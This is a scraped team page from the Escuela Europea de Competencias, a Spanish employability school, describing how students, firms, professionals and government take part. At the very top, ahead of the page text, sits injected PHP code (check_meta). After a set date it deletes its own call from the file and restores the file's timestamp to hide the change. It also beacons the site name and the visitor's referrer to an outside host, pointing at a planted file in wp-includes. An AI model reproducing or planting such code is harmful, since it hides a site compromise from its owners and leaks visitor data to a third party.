check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456731512){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=8&id=18776828&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/wp-includes/ID3/getid.php"); } Escuela Europea de Competencias | Equipo

Forma parte de la escuela

Regístrate y disfruta de las ventajas de ser miembro de la Escuela Europea de Competencias

Ya soy miembro de EEC

También puedes crear una cuenta.

¿Has perdido tu contraseña?

Equipo

La Escuela es un nuevo concepto empresarial con un gran componente social y que se sustenta en:

todos aportamos, todos ganamos

Escuela Europea de Competencias - EquipoDe esta manera, pueden formar parte del equipo de la Escuela cualquier persona o institución de su grupo de interés:

  • Los Estudiantes universitarios y personas en desempleo, a la vez que  son destinatarios de las actividades de la Escuela, tienen opción de ser contratados por ésta o por una entidad colaboradora, siempre y cuando posean el perfil requerido para coordinar una o varias experiencias o actividades para el desarrollo de competencias. Asimismo, podrán proponer nuevas actividades o experiencias de desarrollo, que la Escuela adoptará y remunerará  tras la evaluación de las mismas (adecuación y viabilidad).
  • Las Empresas, como equipo asesor y consultor de la Escuela, tanto para aportar información de sus necesidades de perfiles competenciales como para validar el catálogo de competencias de referencia de la Escuela. Asimismo, y en línea con su Responsabilidad Social, cada Empresa puede poner a disposición de la Escuela recursos (económicos, materiales o humanos) o brindar la oportunidad a los estudiantes de desarrollar competencias participando en actividades propias como campañas de publicidad, stand en ferias, organización de eventos, etc.
  • Profesionales, como asesores, coordinadores de actividad, dinamizadores, mentores o referentes y modelos a seguir por los estudiantes de la Escuela.
  • La Administración, como receptora y difusora, apoyando las actividades y transfiriendo el conocimiento adquirido por la Escuela a sus políticas y líneas de actuación, así como facilitando el acceso y uso de instalaciones públicas.
  • La Sociedad en general, que, como grupo de interés, tiene las puertas abiertas para mostrar sus opiniones y difundir las actividades de la Escuela.

Por supuesto a este equipo se unen todos los Profesionales de IAT, creando una verdadera comunidad al servicio del aumento de la empleabilidad de los profesionales del futuro.

Noticias recientes

Formación “Gestor de Marketing Internacional” – Especialízate gratis!

Formación "Gestor de Marketing Internacional" - Especialízate gratis!

M.IN.D – “Marketing, Internacionalización y Desarrollo”,  es un proyecto europeo de la con[...]

Desmitificando el liderazgo

Desmitificando el liderazgo

¡Menos líderes y más liderazgo! ¡El liderazgo es acción, con un objetivo y un fin claro; no es[...]

¿Quién se ha llevado mi empleo y cómo puedo encontrarlo?

¿Quién se ha llevado mi empleo y cómo puedo encontrarlo?

Sevilla, 2 de Diciembre a las 11:00 horas ¿Sabías que las habilidades de búsqueda de empleo pued[...]

La Escuela en fotos

Accede a nuestra galería de imágenes en Flickr

Activos Recientemente

Avatar de usuario
Avatar de usuario
Avatar de usuario
Avatar de usuario
Avatar de usuario
Avatar de usuario
Avatar de usuario
Avatar de usuario
Avatar de usuario
Avatar de usuario
Avatar de usuario
Avatar de usuario
Avatar de usuario
Avatar de usuario
Avatar de usuario

La escuela en la red

My Great Web page